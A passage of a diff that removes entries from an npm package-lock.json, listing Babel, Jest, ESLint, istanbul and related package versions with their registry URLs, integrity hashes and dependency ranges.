"https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-option": { - "version": "7.23.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.23.5.tgz", - "integrity": "sha512-85ttAOMLsr53VgXkTbkx8oA6YTfT4q7/HzXSLEYmjcSTJPMPQtvq1BD79Byep5xMUYbGRzEpDsjUf3dyp54IKw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helpers": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.24.4.tgz", - "integrity": "sha512-FewdlZbSiwaVGlgT1DPANDuCHaDMiOo+D/IDYRFYjHOuv66xMSJ7fQwwODwRNAPkADIO/z1EoF/l2BCWlWABDw==", - "dev": true, - "dependencies": { - "@babel/template": "^7.24.0", - "@babel/traverse": "^7.24.1", - "@babel/types": "^7.24.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/highlight": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.24.2.tgz", - "integrity": "sha512-Yac1ao4flkTxTteCDZLEvdxg2fZfz1v8M4QpaGypq/WPDqg3ijHYbDfs+LG5hvzSoqaSZ9/Z9lKSP3CjZjv+pA==", - "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/highlight/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" - } - }, - "node_modules/@babel/highlight/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha1-p9BVi9icQveV3UIyj3QIMcpTvCU=", - "dev": true - }, - "node_modules/@babel/highlight/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha1-G2HAViGQqN/2rjuyzwIAyhMLhtQ=", - "dev": true, - "engines": { - "node": ">=0.8.0" - } - }, - "node_modules/@babel/highlight/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha1-tdRU3CGZriJWmfNGfloH87lVuv0=", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/parser": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.24.4.tgz", - "integrity": "sha512-zTvEBcghmeBma9QIGunWevvBAp4/Qu9Bdq+2k0Ot4fVMD6v3dsC9WOcRSKk7tRRyBM/53yKMJko9xOatGQAwSg==", - "dev": true, - "bin": { - "parser": "bin/babel-parser.js" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.24.1", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.24.1.tgz", - "integrity": "sha512-2eCtxZXf+kbkMIsXS4poTvT4Yu5rXiRa+9xGVT56raghjmBTKMpFNc9R4IDiB4emao9eO22Ox7CxuJG7BgExqA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.24.0" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.24.1", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.24.1.tgz", - "integrity": "sha512-Yhnmvy5HZEnHUty6i++gcfH1/l68AHnItFHnaCv6hn9dNh0hQvvQJsxpi4BMBFN5DLeHBuucT/0DgzXif/OyRw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.24.0" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/template": { - "version": "7.24.0", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.24.0.tgz", - "integrity": "sha512-Bkf2q8lMB0AFpX0NFEqSbx1OkTHf0f+0j82mkw+ZpzBnkk7e9Ql0891vlfgi+kHwOk8tQjiQHpqh4LaSa0fKEA==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.23.5", - "@babel/parser": "^7.24.0", - "@babel/types": "^7.24.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/template/node_modules/@babel/code-frame": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.24.2.tgz", - "integrity": "sha512-y5+tLQyV8pg3fsiln67BVLD1P13Eg4lh5RW9mF0zUuvLrv9uIQ4MCL+CRT+FTsBlBjcIan6PGsLcBN0m3ClUyQ==", - "dev": true, - "dependencies": { - "@babel/highlight": "^7.24.2", - "picocolors": "^1.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.24.1", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.24.1.tgz", - "integrity": "sha512-xuU6o9m68KeqZbQuDt2TcKSxUw/mrsvavlEqQ1leZ/B+C9tk6E4sRWy97WaXgvq5E+nU3cXMxv3WKOCanVMCmQ==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.24.1", - "@babel/generator": "^7.24.1", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.24.1", - "@babel/types": "^7.24.0", - "debug": "^4.3.1", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse/node_modules/@babel/code-frame": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.24.2.tgz", - "integrity": "sha512-y5+tLQyV8pg3fsiln67BVLD1P13Eg4lh5RW9mF0zUuvLrv9uIQ4MCL+CRT+FTsBlBjcIan6PGsLcBN0m3ClUyQ==", - "dev": true, - "dependencies": { - "@babel/highlight": "^7.24.2", - "picocolors": "^1.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse/node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/types": { - "version": "7.24.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.24.0.tgz", - "integrity": "sha512-+j7a5c253RfKh8iABBhywc8NSfP5LURe7Uh4qpsh6jc+aLJguvmIUBdjSdEMQv2bENrCR5MfRdjGo7vzS/ob7w==", - "dev": true, - "dependencies": { - "@babel/helper-string-parser": "^7.23.4", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@eslint/eslintrc": { - "version": "0.4.3", - "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-0.4.3.tgz", - "integrity": "sha512-J6KFFz5QCYUJq3pf0mjEcCJVERbzv71PUIDczuh9JkwGEzced6CO5ADLHB1rbf/+oPBtoPfMYNOpGDzCANlbXw==", - "dev": true, - "peer": true, - "dependencies": { - "ajv": "^6.12.4", - "debug": "^4.1.1", - "espree": "^7.3.0", - "globals": "^13.9.0", - "ignore": "^4.0.6", - "import-fresh": "^3.2.1", - "js-yaml": "^3.13.1", - "minimatch": "^3.0.4", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^10.12.0 || >=12.0.0" - } - }, - "node_modules/@humanwhocodes/config-array": { - "version": "0.5.0", - "resolved": "https://registry.npmjs.org/@humanwhocodes/config-array/-/config-array-0.5.0.tgz", - "integrity": "sha512-FagtKFz74XrTl7y6HCzQpwDfXP0yhxe9lHLD1UZxjvZIcbyRz8zTFF/yYNfSfzU414eDwZ1SrO0Qvtyf+wFMQg==", - "dev": true, - "peer": true, - "dependencies": { - "@humanwhocodes/object-schema": "^1.2.0", - "debug": "^4.1.1", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=10.10.0" - } - }, - "node_modules/@humanwhocodes/object-schema": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/@humanwhocodes/object-schema/-/object-schema-1.2.0.tgz", - "integrity": "sha512-wdppn25U8z/2yiaT6YGquE6X8sSv7hNMWSXYSSU1jGv/yd6XqjXgTDJ8KP4NgjTXfJ3GbRjeeb8RTV7a/VpM+w==", - "dev": true, - "peer": true - }, - "node_modules/@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "dependencies": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/@isaacs/cliui/node_modules/ansi-regex": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.0.1.tgz", - "integrity": "sha512-n5M855fKb2SsfMIiFFoVrABHJC8QtHwVx+mHWP3QcEqBHYienj5dHSgjbxtC0WEZXYt4wcD6zrQElDPhFuZgfA==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-regex?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "node_modules/@isaacs/cliui/node_modules/string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "dependencies": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/@isaacs/cliui/node_modules/strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "dependencies": { - "ansi-regex": "^6.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/strip-ansi?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", - "dependencies": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "dependencies": { - "minipass": "^7.0.4" - }, - "engines": { - "node": ">=18.0.0" - } - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@jest/console": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", - "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/core": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", - "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/reporters": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.7.0", - "jest-config": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-resolve-dependencies": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "jest-watcher": "^29.7.0", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/environment": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", - "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", - "dev": true, - "dependencies": { - "expect": "^29.7.0", - "jest-snapshot": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", - "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.6.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/fake-timers": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", - "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/globals": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", - "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/types": "^29.6.3", - "jest-mock": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/reporters": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", - "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^6.0.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - 